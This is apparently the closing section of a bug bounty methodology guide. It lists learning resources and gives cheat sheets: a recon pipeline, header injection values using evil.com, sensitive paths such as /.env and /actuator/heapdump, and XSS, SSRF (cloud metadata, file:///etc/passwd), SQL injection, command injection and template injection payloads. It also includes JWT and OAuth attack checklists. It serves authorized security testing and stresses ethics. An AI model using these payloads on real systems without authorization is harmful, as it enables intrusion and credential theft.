• Web Hacking 101 — earlier Yaworski book, still useful

YouTube channels

• NahamSec — the classic bug bounty channel
• STÖK — methodology, recon, videos
• InsiderPhD — women in infosec, beginner-friendly
• John Hammond — broader infosec
• LiveOverflow — deeper technical content
• IppSec — HTB walkthroughs
• PwnFunction — visual vuln explanations
• Hakluke — bug bounty career advice
• BugBountyReportsExplained — report breakdowns

Blogs / Publications

• PortSwigger Research — Top 10 Web Hacking Techniques annually
• HackerOne Blog
• Intigriti Blog — excellent beginner-to-intermediate content
• Bugcrowd Blog
• PentesterLand Newsletter — weekly digest
• Pentester Land’s List of Bug Bounty Writeups — aggregated community writeups
• Hack The Box blog

Community

• r/bugbounty — Reddit
• HackerOne Discord
• Bugcrowd Discord
• NahamSec Discord (Nahamies)
• Intigriti Discord
• BugBounty Forum (bugbountyforum.com)
• Twitter/X infosec community — follow top hunters, researchers, and programs

Events

• DEF CON Bug Bounty Village
• NahamCon (annual online)
• BSides events worldwide
• Live Hacking Events (LHEs) — H1/Bugcrowd invite-only, high payouts

Key repositories

• EdOverflow/bugbounty-cheatsheet
• nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
• ngalongc/bug-bounty-reference (curated writeups by class)
• enaqx/awesome-pentest
• sehno/Bug-bounty (checklists)
• amrelsagaei/Bug-Bounty-Hunting-Methodology-2025
• R-s0n/bug-bounty-village-defcon32-workshop
• ZephrFish/BugBountyTemplates

20. Quick Reference Cheat Sheets

The 7-question validation gate (run before writing any report)

1. Is it in scope? (asset in scope, vuln class not excluded)
2. Is there real impact? (can you state it as a business consequence?)
3. Can I reproduce it? (fresh browser, clean account, 3 times)
4. Is the PoC clean? (no real user data, no destructive actions)
5. Is severity defensible? (CVSS 3.1 justified?)
6. Has it been reported before? (check disclosed reports for dupes)
7. Does the title sell the impact? (impact formula applied?)

If any answer is “no,” don’t submit yet.

Initial recon one-liner

# Complete passive recon in one shot
d=target.com
subfinder -d $d -all -silent | \
  dnsx -silent -a -resp | \
  awk '{print $1}' | \
  sort -u | \
  httpx -silent -title -tech-detect -sc \
  > recon_$d.txt

gf pattern list (vuln class filtering on URL corpora)

xss, sqli, ssrf, ssti, lfi, redirect, rce, idor, debug_logic, jsvar, interestingsubs

Header injection tests

X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: evil.com
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Custom-IP-Authorization: 127.0.0.1
X-Host: evil.com
X-Forwarded-Server: evil.com
Referer: https://target.com/admin

Common sensitive paths to always check

/.git/config
/.git/HEAD
/.svn/entries
/.env
/.DS_Store
/.htaccess
/wp-config.php.bak
/backup.zip
/admin
/api/swagger.json
/api/docs
/openapi.json
/graphql
/actuator
/actuator/env
/actuator/heapdump
/server-status
/phpinfo.php
/.well-known/security.txt
/robots.txt
/sitemap.xml
/crossdomain.xml
/clientaccesspolicy.xml

XSS polyglot

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>

SSRF payload quick list

http://127.0.0.1
http://localhost
http://127.1
http://0
http://[::1]
http://2130706433
http://169.254.169.254/latest/meta-data/ (AWS)
http://metadata.google.internal/computeMetadata/v1/ (GCP)
http://169.254.169.254/metadata/instance?api-version=2021-02-01 (Azure)
file:///etc/passwd
gopher://127.0.0.1:6379/_<redis commands>

SQLi payload quick list

'
' OR '1'='1
' OR 1=1--
" OR "" = "
') OR ('1'='1
1' AND SLEEP(5)--
1 UNION SELECT NULL,NULL,NULL--
';WAITFOR DELAY '0:0:5'--

Command injection separators

;id
|id
||id
&id
&&id
`id`
$(id)
%0aid
%0did

Template injection fingerprint

{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
${{7*7}}

OAuth testing checklist

• Is state parameter present and validated?
• Can redirect_uri be modified? Trailing slash? Subdirectory? Open redirect in path?
• PKCE enabled?
• Implicit flow used where authorization code should be?
• Token leaked in Referer header?
• Can you trigger flow from attacker-controlled site (CSRF)?
• What happens if you send the code twice?

JWT quick tests

• Change alg to none, remove signature
• Change alg from RS256 to HS256 and sign with public key
• Inject kid pointing to /dev/null or predictable file
• Change role / admin / sub claims
• Reuse an expired token (is exp checked?)
• Reuse another user’s token (is audience checked?)

Report title templates

[Stored XSS] in [Profile Bio field on /settings/profile] allows [account takeover via cookie theft]
[IDOR] in [PATCH /api/users/{id}] allows [any authenticated user to modify any other user's email]
[SSRF] in [PDF export feature at /reports/export] allows [reading AWS IAM credentials via metadata service]
[Authentication Bypass] in [OAuth callback at /oauth/callback] allows [full account takeover via state parameter manipulation]
[SQL Injection] in [sort parameter at /api/items?sort=X] allows [extracting the entire users table]

Daily hunting checklist

• Scope still valid? New assets added?
• New disclosed reports on this program since last session?
• Tech stack changes detected?
• New JavaScript files diffed?
• 2-hour focused test session on one asset
• Notes updated
• Interesting findings tracked even if not immediately exploitable
• One thing learned today?

Closing Notes

Bug bounty hunting in 2026 is simultaneously harder and more lucrative than ever. The easy bugs are gone from mainstream targets, automation has commoditized the shallow layer, and competition is global. But the hunters who build deep target knowledge, develop one vulnerability class to mastery, and write surgical reports are making more than they ever have.

The methodology in this guide is not prescriptive — it is a starting blueprint. The best bug bounty methodology is the one you build yourself over time, refining each week based on what works on your targets. Steal ideas liberally; test them ruthlessly; keep what earns.

A few final principles worth internalizing:

1. Depth > breadth — always.
2. New code is buggy code — be there first.
3. Chains > isolated bugs — every low is a potential step toward critical.
4. Reports sell the bug — write like the triager is exhausted (they are).
5. Community compounds — share, learn, and help others; invites follow reputation.
6. Consistency beats intensity — 2 hours a day for a year beats 12 hours a day for a month.
7. Ethical limits are hard constraints — never trade your integrity for a payout.

Happy hunting. Break things, but only the things you’re allowed to break.

Compiled from 97 research sources. Defensive security / ethical hacking reference. Do not test targets without explicit authorization.